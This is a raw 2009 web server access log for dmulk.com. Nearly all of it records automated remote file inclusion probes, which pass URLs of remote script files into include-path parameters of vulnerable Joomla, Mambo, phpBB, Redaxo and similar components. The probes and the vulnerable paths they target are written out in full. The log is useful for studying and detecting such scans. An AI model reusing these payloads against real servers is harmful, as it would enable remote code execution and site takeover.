209.172.33.230 - - [21/Jun/2009:10:42:52 -0700] "GET /logs/access_080913.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:42:53 -0700] "GET /logs/access_080413.log%20%20//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:42:53 -0700] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:42:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
123.242.165.138 - - [21/Jun/2009:10:42:55 -0700] "GET /logs/access_080519.log//modules/My_eGallery/public/displayCategory.php?basepath=http://sunset-travel.ro/ro/includes/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:42:55 -0700] "GET /logs/access_080913.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:42:56 -0700] "GET /logs/access_080107.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:42:56 -0700] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:10:42:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:42:58 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20913 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:43:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:43:00 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:43:00 -0700] "GET /logs/access_080519.log//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:43:03 -0700] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:43:05 -0700] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:43:05 -0700] "GET /logs/access_080413.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:43:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:43:07 -0700] "GET /logs/access_080531.log//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:43:08 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20913 "-" "Mozilla/5.0" "dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:43:10 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20913 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:43:20 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20908 "-" "Mozilla/5.0" "dmulk.com"
86.55.5.122 - - [21/Jun/2009:10:43:32 -0700] "GET /logs/access_090122.log/includes/functions.php?phpbb_root_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.55.5.122 - - [21/Jun/2009:10:43:32 -0700] "GET /includes/functions.php?phpbb_root_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.55.5.122 - - [21/Jun/2009:10:43:32 -0700] "GET /logs/includes/functions.php?phpbb_root_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.55.5.122 - - [21/Jun/2009:10:43:37 -0700] "GET /logs/access_090424.log/includes/functions.php?phpbb_root_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:43:38 -0700] "GET /logs/access_080913.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:10:43:47 -0700] "GET /logs/access_081117.log//modules/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:10:43:47 -0700] "GET /modules/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:10:43:47 -0700] "GET /logs//modules/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:10:43:51 -0700] "GET /logs/access_090301.log//modules/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:43:55 -0700] "GET /logs/access_081114.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:44:01 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:44:09 -0700] "GET /logs/access_080107.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:44:18 -0700] "GET /logs/access_080413.log//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:44:19 -0700] "GET /logs/access_081114.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:44:24 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:44:28 -0700] "GET /logs/access_090328.log//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:44:57 -0700] "GET /logs/access_090408.log//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:44:59 -0700] "GET /logs/access_081018.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:45:06 -0700] "GET /logs/access_081124.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:10:45:06 -0700] "GET /logs//modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:10:45:07 -0700] "GET /modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:45:11 -0700] "GET /logs/access_080524.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:10:45:15 -0700] "GET /logs/access_071212.log//modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:10:45:16 -0700] "GET /logs/access_080130.log//modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:45:39 -0700] "GET /logs/access_080107.log%20%20//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:45:44 -0700] "GET /logs/access_080413.log%20%20//index.php?option=com_joomlaxplorer&action=show_error&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:46:43 -0700] "GET /logs/access_080913.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:46:54 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:46:54 -0700] "GET /logs/access_081224.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:46:54 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:47:43 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.223.104.57 - - [21/Jun/2009:10:48:03 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.223.104.57 - - [21/Jun/2009:10:48:04 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.223.104.57 - - [21/Jun/2009:10:48:12 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:48:16 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:48:16 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:48:16 -0700] "GET /logs/access_081224.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:48:21 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:48:21 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:48:22 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.158.98.196 - - [21/Jun/2009:10:48:29 -0700] "GET /logs/access_080107.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:48:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:48:30 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:48:30 -0700] "GET /logs/access_080519.log//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:10:48:35 -0700] "GET /logs/access_080531.log//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:48:37 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:10:48:52 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:10:48:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:48:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:48:54 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:10:49:07 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 200 20903 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:49:19 -0700] "GET /logs/access_080408.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:20 -0700] "GET /logs/access_081224.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:25 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:25 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:25 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:27 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:27 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:49:27 -0700] "GET /logs/access_081224.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.223.104.57 - - [21/Jun/2009:10:49:30 -0700] "GET /logs/access_080501.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:49:30 -0700] "GET /logs/access_081114.log//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:49:34 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:49:57 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:49:57 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:49:57 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:49:58 -0700] "GET /logs/access_081021.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:49:58 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:49:58 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:50:00 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.150.52 - - [21/Jun/2009:10:50:03 -0700] "GET /logs/access_080107.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:50:08 -0700] "GET /logs/access_081007.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:50:09 -0700] "GET /logs/access_081021.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:15 -0700] "GET /redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:15 -0700] "GET /logs/access_080616.log%20%20//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:15 -0700] "GET /logs//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [21/Jun/2009:10:50:16 -0700] "GET /logs/access_090109.log//galeria.php?start=0&kategoria=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:50:21 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:50:21 -0700] "GET /logs/errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:50:22 -0700] "GET /errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.178.144.209 - - [21/Jun/2009:10:50:24 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.dcas.com.ar/diego/PROGRAMACION01_archivos/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.178.144.209 - - [21/Jun/2009:10:50:24 -0700] "GET /logs/access_080808.log//modules/TotalCalendar/about.php?inc_dir=http://www.dcas.com.ar/diego/PROGRAMACION01_archivos/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.178.144.209 - - [21/Jun/2009:10:50:24 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.dcas.com.ar/diego/PROGRAMACION01_archivos/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.178.144.209 - - [21/Jun/2009:10:50:24 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.dcas.com.ar/diego/PROGRAMACION01_archivos/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:29 -0700] "GET /redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:29 -0700] "GET /logs//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:50:29 -0700] "GET /logs/access_080616.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:50:40 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:50:42 -0700] "GET /logs/access_080314.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:50:45 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:51:02 -0700] "GET /logs/access_080121.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [21/Jun/2009:10:51:05 -0700] "GET /logs/access_080121.log%20%20//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
